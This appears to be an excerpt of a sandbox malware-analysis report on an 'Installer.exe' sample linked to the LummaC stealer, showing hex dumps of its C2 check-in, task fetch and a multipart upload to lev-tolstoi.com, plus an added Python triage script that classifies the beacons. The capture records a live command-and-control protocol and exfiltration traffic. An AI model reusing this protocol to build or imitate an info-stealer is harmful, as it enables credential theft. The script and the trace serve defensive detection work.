                                                                                                                                                                                                                                                  2024-12-27 22:13:26 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                  Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                                  2024-12-27 22:13:26 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                  Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49735 | 104.21.66.86 | 443 | 7488 | C:\Users\user\Desktop\Installer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 22:13:28 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: lev-tolstoi.com
2024-12-27 22:13:28 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-27 22:13:29 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 22:13:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=fdgeg9mgvu601pb18m2slj454d; expires=Tue, 22 Apr 2025 16:00:07 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LTaTN%2BuzyfJmkHBfPb0lr03lOBcxwpDsiY947ZaHaUIGuQETOfnz8IM%2FwVZ%2FztgrZCyZZvkjck7jmV0qipyAB%2B34IR%2BtVdnVo9sBNV%2FgLbX%2B7VzikPRcwZPWrajc8ZuqSz0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f8ca875ac873300-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1827&min_rtt=1813&rtt_var=690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1610590&cwnd=236&unsent_bytes=0&cid=20cb86ea1ae0903a&ts=766&x=0"
2024-12-27 22:13:29 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-27 22:13:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


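The two POST /api sessions (act=life above, act=recive_message in the next session) are the sample's C2 check-in and task fetch, and the act=life reply is a chunked body ("2\r\nok\r\n" then "0\r\n\r\n") whose payload is just "ok". The following Python is an added triage example and is not part of the Joe Sandbox report or the malware: it reassembles chunked bodies from the captured bytes, tolerates the truncation the report applies to long chunks, and labels each request using only indicators visible in the trace. The request tuples and byte strings are reconstructed from the sessions shown; the set of act values is limited to the two the trace contains. LummaC is documented elsewhere as fetching a Steam profile to recover its C2 domain, but this report shows only the GET and the subsequent POSTs, so the example flags the sequence without claiming how the domain was derived.

```python
"""Triage helpers for the C2 exchange in the trace above (added example, not
part of the Joe Sandbox report).  Inputs are reconstructed from the captured
sessions; nothing here decrypts the recive_message payload."""
import re
from typing import Iterable
from urllib.parse import parse_qs

# Reconstructed from the three sessions: (host, method, path, request body).
CAPTURED_REQUESTS = [
    ("steamcommunity.com", "GET", "/profiles/76561199724331900", b""),
    ("lev-tolstoi.com", "POST", "/api", b"act=life"),
    ("lev-tolstoi.com", "POST", "/api",
     b"act=recive_message&ver=4.0&lid=yau6Na--5223198671&j="),
]

# Chunked reply to act=life, hex exactly as captured: "2\r\nok\r\n" then "0\r\n\r\n".
ACT_LIFE_RESPONSE = bytes.fromhex("32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a")

# The report shows only the start of the 0x471-byte first chunk of the
# act=recive_message reply; this prefix is used to exercise partial handling.
RECIVE_MESSAGE_PREFIX = (
    b"471\r\n"
    b"tKWMmTpbrYMG9XX2xQGa2AMe1Xl1huT5vtQ3b0PPAVrPh/q7AG+BoXWQV8yxc++9Lzy0HVe8gpjSp1JDY"
)

BEACON_ACTS = {"life", "recive_message"}   # only the actions visible in the trace
B64_CHARSET = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")


def dechunk(data: bytes, allow_partial: bool = False) -> tuple[bytes, bool]:
    """Reassemble an HTTP/1.1 chunked body.

    Returns (payload, complete).  Sandbox exports truncate long chunks, so
    allow_partial=True returns whatever bytes were present instead of raising.
    """
    out = bytearray()
    pos = 0
    while True:
        eol = data.find(b"\r\n", pos)
        if eol < 0:
            if allow_partial:
                return bytes(out), False
            raise ValueError("truncated chunk-size line")
        size = int(data[pos:eol].split(b";", 1)[0], 16)  # drop chunk extensions
        pos = eol + 2
        if size == 0:                                    # last-chunk marker
            return bytes(out), True
        chunk = data[pos:pos + size]
        out += chunk
        if len(chunk) < size:
            if allow_partial:
                return bytes(out), False
            raise ValueError("truncated chunk body")
        pos += size + 2                                  # skip CRLF after data


def looks_base64(payload: bytes, min_len: int = 16) -> bool:
    """Cheap opaque-payload check: a long run of base64 alphabet only."""
    return len(payload) >= min_len and B64_CHARSET.match(payload) is not None


def classify(host: str, method: str, path: str, body: bytes) -> str:
    """Label one request using only the indicators present in the trace."""
    if host == "steamcommunity.com" and method == "GET" and path.startswith("/profiles/"):
        return "steam-profile-lookup"
    if method == "POST" and path == "/api":
        params = parse_qs(body.decode("ascii", "replace"), keep_blank_values=True)
        act = params.get("act", [""])[0]
        if act in BEACON_ACTS:
            lid = params.get("lid", [""])[0]
            return f"lumma-beacon act={act}" + (f" lid={lid}" if lid else "")
    return "unclassified"


def triage(requests: Iterable[tuple[str, str, str, bytes]]) -> list[str]:
    """Classify a sequence of requests in capture order."""
    return [classify(*req) for req in requests]


if __name__ == "__main__":
    for label in triage(CAPTURED_REQUESTS):
        print(label)
    print(dechunk(ACT_LIFE_RESPONSE))
    body, complete = dechunk(RECIVE_MESSAGE_PREFIX, allow_partial=True)
    print(complete, looks_base64(body), body[:32])
```

The act=life beacon carries no client identifier, so on its own it is a weak signal; the act=recive_message request with its lid value is the one worth pivoting on, and the opaque base64-looking reply is the task or configuration blob that the report cannot show decoded.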
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49736 | 104.21.66.86 | 443 | 7488 | C:\Users\user\Desktop\Installer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 22:13:30 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 52
Host: lev-tolstoi.com
2024-12-27 22:13:30 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 35 32 32 33 31 39 38 36 37 31 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--5223198671&j=
2024-12-27 22:13:31 UTC | 1119 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 22:13:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=mh0fbkuv09iggm2loonnj879s3; expires=Tue, 22 Apr 2025 16:00:09 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=48E51UsQl1YpHLnRVUDic3%2BzFMpKv9Mxp8OJM4FwIubNhL9mJuDAQ7036GBdUcVJ8oWZoFuyhdkNTMd8tp6PxKB8J5C3CGKcKXjSz7qgWupAF0JyxiGldjzGwcEfTbrHU3Y%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f8ca882bfb19e04-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1781&rtt_var=690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=951&delivery_rate=1562332&cwnd=236&unsent_bytes=0&cid=b353108630ab5be5&ts=825&x=0"
2024-12-27 22:13:31 UTC | 250 | IN | Data Raw: 34 37 31 0d 0a 74 4b 57 4d 6d 54 70 62 72 59 4d 47 39 58 58 32 78 51 47 61 32 41 4d 65 31 58 6c 31 68 75 54 35 76 74 51 33 62 30 50 50 41 56 72 50 68 2f 71 37 41 47 2b 42 6f 58 57 51 56 38 79 78 63 2b 2b 39 4c 7a 79 30 48 56 65 38 67 70 6a 53 70 31 4a 44 59 62 6c 73 65 49 37 44 37 66 56 4a 50 6f 47 68 59 34 31 58 7a 4a 35 36 75 4c 31 74 50 4f 39 62 45 4f 79 47 6d 4e 4b 32 56 67 51 73 76 32 30 35 33 4d 6e 72 38 56 38 34 79 65 4a 71 6d 42 43 54 6f 47 44 77 74 6d 70 7a 76 52 52 58 71 73 61 63 78 50 59 4e 54 51 36 71 64 54 76 35 78 50 2f 79 47 43 61 42 2b 43 53 51 47 39 54 2f 49 2f 75 39 59 58 4b 7a 48 52 37 75 6a 4a 48 61 74 31 4d 46 4d 36 5a 6e 4d 74 7a 48 36 50 42 56 4d 64 33 76 59 4a 38 62 6c 61 70 67 75 50 51 68 65 36 39 62 54 36 54 56 71
Data Ascii: 471tKWMmTpbrYMG9XX2xQGa2AMe1Xl1huT5vtQ3b0PPAVrPh/q7AG+BoXWQV8yxc++9Lzy0HVe8gpjSp1JDYblseI7D7fVJPoGhY41XzJ56uL1tPO9bEOyGmNK2VgQsv2053Mnr8V84yeJqmBCToGDwtmpzvRRXqsacxPYNTQ6qdTv5xP/yGCaB+CSQG9T/I/u9YXKzHR7ujJHat1MFM6ZnMtzH6PBVMd3vYJ8blapguPQhe69bT6TVq
2024-12-27 22:13:31 UTC | 894 | IN | Data Raw: 64 2b 6e 52 42 67 73 76 57 56 34 79 59 6e 33 75 31 38 31 6a 37 6b 6b 6e 78 75 61 6f 6d 44 33 76 57 42 38 70 52 51 58 35 34 36 54 32 4c 78 61 41 69 36 6a 61 54 2f 65 7a 75 6e 30 58 7a 48 4a 37 6d 66 58 57 64 53 67 65 37 6a 69 49 56 79 6e 47 42 54 77 69 34 71 63 71 52 73 55 59 61 70 76 65 49 36 48 36 50 56 5a 4e 4d 2f 7a 62 4a 77 63 6b 62 56 6f 38 62 64 73 66 4c 6f 52 47 4f 65 47 6e 4e 61 38 57 67 63 6c 6f 47 34 2b 31 73 65 75 74 52 67 2b 31 36 45 38 31 7a 53 52 74 32 54 30 72 43 4e 47 39 77 52 5a 2f 63 61 63 30 50 59 4e 54 53 6d 6f 59 44 76 64 79 4f 33 7a 55 79 76 50 38 32 4b 61 45 6f 61 68 5a 76 61 77 59 6d 36 39 46 52 48 6e 6a 35 44 56 73 31 49 4a 59 65 4d 6a 50 38 36 48 74 72 74 35 4e 4d 54 74 62 6f 41 58 31 4c 67 74 34 66 70 6d 63 50 64 44 56 2b 43 48
Data Ascii: d+nRBgsvWV4yYn3u181j7kknxuaomD3vWB8pRQX546T2LxaAi6jaT/ezun0XzHJ7mfXWdSge7jiIVynGBTwi4qcqRsUYapveI6H6PVZNM/zbJwckbVo8bdsfLoRGOeGnNa8WgcloG4+1seutRg+16E81zSRt2T0rCNG9wRZ/cac0PYNTSmoYDvdyO3zUyvP82KaEoahZvawYm69FRHnj5DVs1IJYeMjP86Htrt5NMTtboAX1Lgt4fpmcPdDV+CH
2024-12-27 22:13:31 UTC | 1369 | IN | Data Raw: 34 34 61 62 0d 0a 2f 76 49 67 70 79 78 57 55 31 35 37 57 77 33 32 63 2f 75 2b 6c 77 30 79 2b 42 70 6d 78 36 58 71 32 2f 77 74 32 31 34 75 42 4d 66 35 34 36 4a 30 72 68 54 43 79 47 6f 49 33 61 57 77 50 61 37 41 48 6e 72 37 33 4f 44 48 4e 61 53 59 50 61 30 5a 6d 72 33 42 46 6e 39 78 70 7a 51 39 67 31 4e 4c 36 42 6f 4e 4e 48 4f 37 2f 68 59 4d 38 48 75 62 70 38 66 6c 4b 70 69 38 37 4a 6e 63 62 77 55 47 4f 4f 4f 6d 4e 43 7a 57 41 35 68 34 79 4d 2f 7a 6f 65 32 75 33 30 33 7a 50 42 31 31 53 4b 58 71 57 33 2f 72 43 46 6a 2b 51 4a 58 34 34 72 62 68 50 5a 66 43 69 61 70 62 6a 4c 56 77 2b 72 32 56 7a 44 47 36 48 61 64 47 35 71 31 62 76 4b 2f 62 33 43 79 46 42 66 6c 68 35 58 57 76 52 56 44 59 61 70 37 65 49 36 48 77 66 5a 49 4b 38 58 71 64 64 55 69 6c 36 6c 74 2f 36
Data Ascii: 44ab/vIgpyxWU157Ww32c/u+lw0y+Bpmx6Xq2/wt214uBMf546J0rhTCyGoI3aWwPa7AHnr73ODHNaSYPa0Zmr3BFn9xpzQ9g1NL6BoNNHO7/hYM8Hubp8flKpi87JncbwUGOOOmNCzWA5h4yM/zoe2u303zPB11SKXqW3/rCFj+QJX44rbhPZfCiapbjLVw+r2VzDG6HadG5q1bvK/b3CyFBflh5XWvRVDYap7eI6HwfZIK8XqddUil6lt/6
2024-12-27 22:13:31 UTC | 1369 | IN | Data Raw: 44 52 32 6b 6d 64 58 46 39 6c 49 42 59 66 55 6a 4d 74 72 44 37 66 64 52 4e 63 4c 67 59 4a 41 61 6b 4b 64 6c 2f 72 39 67 64 37 38 58 47 4f 36 4b 6e 39 43 2f 55 77 45 69 72 6d 56 34 6d 49 66 70 34 78 68 68 6a 38 42 70 6e 42 75 55 70 48 4c 2f 2b 69 38 38 75 52 30 58 70 4e 36 4e 7a 4b 46 53 45 6d 2b 30 49 7a 2f 61 68 37 61 37 55 69 76 4b 37 32 43 64 45 70 43 72 61 66 69 2f 63 33 53 78 48 42 76 73 67 35 54 61 73 31 67 4b 4b 71 35 78 4b 74 58 44 34 50 63 59 64 34 2f 6d 66 4e 64 50 31 49 4a 30 2b 36 70 6e 66 2f 63 45 57 66 33 47 6e 4e 44 32 44 55 30 68 6f 32 38 7a 30 63 7a 6c 2f 31 77 35 77 75 70 71 6d 52 36 59 72 32 2f 2f 71 47 78 35 76 78 45 65 34 59 71 57 33 36 52 57 44 47 48 6a 49 7a 2f 4f 68 37 61 37 66 77 72 34 77 69 53 49 57 59 33 6e 5a 50 54 36 4f 54 79
                                                                                                                                                                                                                                                  Data Ascii: DR2kmdXF9lIBYfUjMtrD7fdRNcLgYJAakKdl/r9gd78XGO6Kn9C/UwEirmV4mIfp4xhhj8BpnBuUpHL/+i88uR0XpN6NzKFSEm+0Iz/ah7a7UivK72CdEpCrafi/c3SxHBvsg5Tas1gKKq5xKtXD4PcYd4/mfNdP1IJ0+6pnf/cEWf3GnND2DU0ho28z0czl/1w5wupqmR6Yr2//qGx5vxEe4YqW36RWDGHjIz/Oh7a7fwr4wiSIWY3nZPT6OTy
                                                                                                                                                                                                                                                  2024-12-27 22:13:31 UTC1369INData Raw: 38 61 45 6b 71 38 56 43 69 33 74 4f 33 6a 52 7a 2b 62 31 57 7a 2f 45 37 57 69 57 48 70 4b 69 61 2f 2b 31 5a 6e 57 77 47 78 48 32 67 5a 62 56 74 6c 34 45 4b 36 6c 69 4d 35 61 4a 72 76 78 41 65 5a 65 68 56 70 41 42 68 4b 51 6a 35 2f 52 34 50 4c 41 58 56 37 7a 47 6c 73 36 33 55 42 38 6c 6f 6d 67 71 33 63 48 75 2f 6b 6f 2b 77 2b 74 72 6c 42 2b 5a 70 47 76 71 75 6d 78 38 70 51 6b 52 37 34 6a 62 6b 76 5a 53 46 57 48 31 49 77 6e 42 7a 4b 37 6b 46 69 43 50 35 6d 6a 58 54 39 53 6b 61 66 57 30 63 33 69 78 45 42 54 71 6a 70 37 55 73 6c 38 41 4c 71 5a 70 4d 64 37 48 34 66 35 51 4d 73 6e 76 5a 5a 45 62 6d 65 63 74 75 4c 31 35 50 4f 39 62 4d 50 36 4c 6e 63 75 6e 59 41 6f 68 2f 43 4d 6e 6d 4e 36 75 2f 46 52 35 6c 36 46 70 6d 78 32 5a 6f 6d 66 77 76 57 4a 39 75 78 38 61
                                                                                                                                                                                                                                                  Data Ascii: 8aEkq8VCi3tO3jRz+b1Wz/E7WiWHpKia/+1ZnWwGxH2gZbVtl4EK6liM5aJrvxAeZehVpABhKQj5/R4PLAXV7zGls63UB8lomgq3cHu/ko+w+trlB+ZpGvqumx8pQkR74jbkvZSFWH1IwnBzK7kFiCP5mjXT9SkafW0c3ixEBTqjp7Usl8ALqZpMd7H4f5QMsnvZZEbmectuL15PO9bMP6LncunYAoh/CMnmN6u/FR5l6Fpmx2ZomfwvWJ9ux8a
                                                                                                                                                                                                                                                  2024-12-27 22:13:31 UTC1369INData Raw: 54 32 57 77 41 6e 72 47 49 77 33 73 66 6f 38 56 77 36 78 75 4a 6a 6e 68 47 66 70 47 6e 33 76 57 64 34 74 78 41 51 36 6f 43 65 31 37 38 56 51 32 47 71 65 33 69 4f 68 38 6a 59 53 69 76 39 37 32 65 4d 56 34 76 70 65 72 69 39 62 54 7a 76 57 78 7a 73 69 59 6e 5a 76 31 30 4a 4b 4b 31 6e 4d 74 76 41 37 76 35 56 50 4d 76 76 59 4a 41 58 6d 4b 68 6b 38 4c 56 6c 66 4c 68 62 57 61 53 42 67 35 7a 75 46 53 30 71 75 30 49 32 33 64 57 75 35 42 59 67 6a 2b 5a 6f 31 30 2f 55 71 57 72 35 73 6d 39 77 76 78 38 46 35 49 32 53 30 37 64 61 44 53 4b 73 61 54 44 45 77 65 37 77 55 44 37 48 35 57 71 46 46 70 76 6e 4c 62 69 39 65 54 7a 76 57 79 62 79 67 5a 7a 54 39 48 77 4b 4f 71 78 70 4f 39 33 4c 72 75 51 57 49 49 2f 6d 61 4e 64 50 31 4b 70 76 39 62 35 7a 63 4c 63 62 48 75 4f 4d 69
                                                                                                                                                                                                                                                  Data Ascii: T2WwAnrGIw3sfo8Vw6xuJjnhGfpGn3vWd4txAQ6oCe178VQ2Gqe3iOh8jYSiv972eMV4vperi9bTzvWxzsiYnZv10JKK1nMtvA7v5VPMvvYJAXmKhk8LVlfLhbWaSBg5zuFS0qu0I23dWu5BYgj+Zo10/UqWr5sm9wvx8F5I2S07daDSKsaTDEwe7wUD7H5WqFFpvnLbi9eTzvWybygZzT9HwKOqxpO93LruQWII/maNdP1Kpv9b5zcLcbHuOMi
                                                                                                                                                                                                                                                  2024-12-27 22:13:31 UTC1369INData Raw: 4d 4c 61 64 6b 4e 73 54 47 35 50 64 5a 50 73 6a 71 64 70 77 46 6e 36 39 67 39 72 4a 6f 66 4c 6b 62 46 75 6d 47 32 35 4c 32 55 68 56 68 39 53 4d 64 39 64 44 34 38 52 6f 61 32 50 64 75 6b 42 75 43 72 47 4c 37 72 47 78 73 39 31 56 58 39 59 47 4b 6e 4f 35 44 48 54 61 71 66 48 62 50 68 2b 6e 33 47 47 47 50 36 6d 75 5a 47 70 2b 6a 61 76 32 79 59 6e 6d 79 45 52 76 6f 68 35 50 56 76 46 41 49 4a 36 64 67 4e 74 6e 47 34 76 39 52 4e 38 61 68 4b 74 63 51 6a 4f 63 37 75 49 78 78 65 36 38 57 42 36 61 30 6d 4d 32 6e 51 41 41 78 71 79 45 58 31 63 76 74 2f 6c 38 70 6a 2f 34 71 6a 6c 65 54 71 79 4f 67 2b 6d 46 34 75 78 67 51 36 6f 6d 57 30 37 46 65 41 69 75 6a 63 54 66 54 7a 2b 4c 7a 56 53 76 46 36 33 61 65 48 70 6d 70 61 2b 71 35 49 54 4c 33 48 41 2b 6b 33 74 76 75 76 46
                                                                                                                                                                                                                                                  Data Ascii: MLadkNsTG5PdZPsjqdpwFn69g9rJofLkbFumG25L2UhVh9SMd9dD48Roa2PdukBuCrGL7rGxs91VX9YGKnO5DHTaqfHbPh+n3GGGP6muZGp+jav2yYnmyERvoh5PVvFAIJ6dgNtnG4v9RN8ahKtcQjOc7uIxxe68WB6a0mM2nQAAxqyEX1cvt/l8pj/4qjleTqyOg+mF4uxgQ6omW07FeAiujcTfTz+LzVSvF63aeHpmpa+q5ITL3HA+k3tvuvF
                                                                                                                                                                                                                                                  2024-12-27 22:13:31 UTC1369INData Raw: 63 7a 76 54 77 4e 44 46 56 6a 37 62 35 6d 71 52 46 39 54 70 49 2f 66 36 4f 55 58 33 55 31 66 62 79 4e 76 45 39 67 31 4e 46 4b 35 74 4e 74 48 52 2f 37 5a 37 4c 74 6e 72 66 39 55 78 6b 37 5a 71 37 72 64 7a 50 50 6c 62 45 61 54 65 79 35 4c 32 55 52 78 68 39 54 4e 71 6a 5a 4b 39 72 41 68 72 30 4b 39 39 31 77 48 55 2f 7a 47 32 2b 6e 4d 38 37 31 74 51 35 35 53 4a 32 72 56 44 44 6d 61 54 58 52 6a 64 30 65 2f 32 55 7a 58 78 33 33 47 55 47 5a 71 67 64 65 6e 36 4c 7a 79 34 57 30 2f 64 78 74 4f 63 69 52 74 4e 4f 65 30 37 65 4f 50 45 34 50 56 66 4c 39 36 73 52 4a 77 42 6c 61 70 6f 39 50 68 67 63 61 63 63 56 36 72 47 6e 5a 7a 75 42 55 4e 68 71 58 4a 34 6a 70 65 38 6f 41 31 71 6d 4c 45 32 69 46 6d 4e 35 33 57 34 34 6a 4d 79 39 77 6c 58 76 4d 62 63 33 36 52 48 43 79 4b
                                                                                                                                                                                                                                                  Data Ascii: czvTwNDFVj7b5mqRF9TpI/f6OUX3U1fbyNvE9g1NFK5tNtHR/7Z7Ltnrf9Uxk7Zq7rdzPPlbEaTey5L2URxh9TNqjZK9rAhr0K991wHU/zG2+nM871tQ55SJ2rVDDmaTXRjd0e/2UzXx33GUGZqgden6Lzy4W0/dxtOciRtNOe07eOPE4PVfL96sRJwBlapo9PhgcaccV6rGnZzuBUNhqXJ4jpe8oA1qmLE2iFmN53W44jMy9wlXvMbc36RHCyK
                                                                                                                                                                                                                                                  2024-12-27 22:13:31 UTC1369INData Raw: 59 65 67 75 31 35 35 6c 37 4d 71 31 78 4f 46 35 7a 75 6f 36 44 6f 70 35 45 78 48 74 70 6e 56 78 66 5a 44 54 58 6e 2f 4c 58 6a 45 68 37 61 37 48 7a 72 64 38 32 4b 55 41 5a 66 67 58 63 61 63 59 6e 75 78 47 42 6e 7a 6c 39 6e 7a 74 56 34 42 4c 61 70 31 42 75 6a 53 37 66 56 57 50 74 6e 77 4a 4e 6c 58 6d 2b 63 37 77 66 70 77 64 72 42 58 58 36 69 58 69 4e 4b 39 51 77 70 68 6b 69 31 34 7a 6f 65 32 75 32 30 36 77 65 39 6a 67 51 62 5a 67 57 44 2f 76 47 4a 79 6f 41 70 58 71 73 61 64 6e 4f 34 48 51 32 47 70 63 6e 69 4f 6c 37 79 67 44 57 71 59 73 54 61 49 57 59 33 6e 64 62 6a 69 4d 6a 4c 33 43 56 65 38 78 74 7a 53 75 31 51 4f 4c 36 35 78 4b 74 44 45 2b 50 67 66 42 2f 48 45 61 5a 6f 53 6d 71 42 64 78 70 74 72 62 4c 6f 55 45 4e 71 34 72 4d 32 78 52 55 38 48 72 6e 55 37
                                                                                                                                                                                                                                                  Data Ascii: Yegu155l7Mq1xOF5zuo6Dop5ExHtpnVxfZDTXn/LXjEh7a7Hzrd82KUAZfgXcacYnuxGBnzl9nztV4BLap1BujS7fVWPtnwJNlXm+c7wfpwdrBXX6iXiNK9Qwphki14zoe2u206we9jgQbZgWD/vGJyoApXqsadnO4HQ2GpcniOl7ygDWqYsTaIWY3ndbjiMjL3CVe8xtzSu1QOL65xKtDE+PgfB/HEaZoSmqBdxptrbLoUENq4rM2xRU8HrnU7


Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49737 | Destination IP: 104.21.66.86 | Destination Port: 443 | PID: 7488 | Process: C:\Users\user\Desktop\Installer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 22:13:32 UTC | 272 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=PTTT95CE7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18114
Host: lev-tolstoi.com
2024-12-27 22:13:32 UTC | 15331 | OUT | Data Ascii (multipart body, truncated in the capture):
--PTTT95CE7
Content-Disposition: form-data; name="hwid"

4EAC7AD5F775DFB71441EDD8E05CE3DA
--PTTT95CE7
Content-Disposition: form-data; name="pid"

2
--PTTT95CE7
Content-Disposition: form-data; name="lid"

yau6Na--5223198671
--PTTT95CE7
Content
2024-12-27 22:13:32 UTC | 2783 | OUT | Data Raw: [binary payload; hex dump not reproduced]
2024-12-27 22:13:33 UTC | 1127 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 22:13:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=cl53q3p7ftlmtcerli4tovjj31; expires=Tue, 22 Apr 2025 16:00:12 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l8T%2FJbKZppfl02RFZaJwJ6pb74zjbP7m7Dql3zPxt1rygLUKXtypNmB1r0TFMHnMVkJfmf9xwjpDokeqQOzZX4H9jN5E1%2BGTu8a57AB25sCGAjFZYKaU%2BK28mpw5yYD5Vnw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f8ca890ef1543a6-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1734&min_rtt=1695&rtt_var=663&sent=12&recv=21&lost=0&retrans=0&sent_bytes=2835&recv_bytes=19066&delivery_rate=1722713&cwnd=186&unsent_bytes=0&cid=14b7ac484a1eece2&ts=985&x=0"
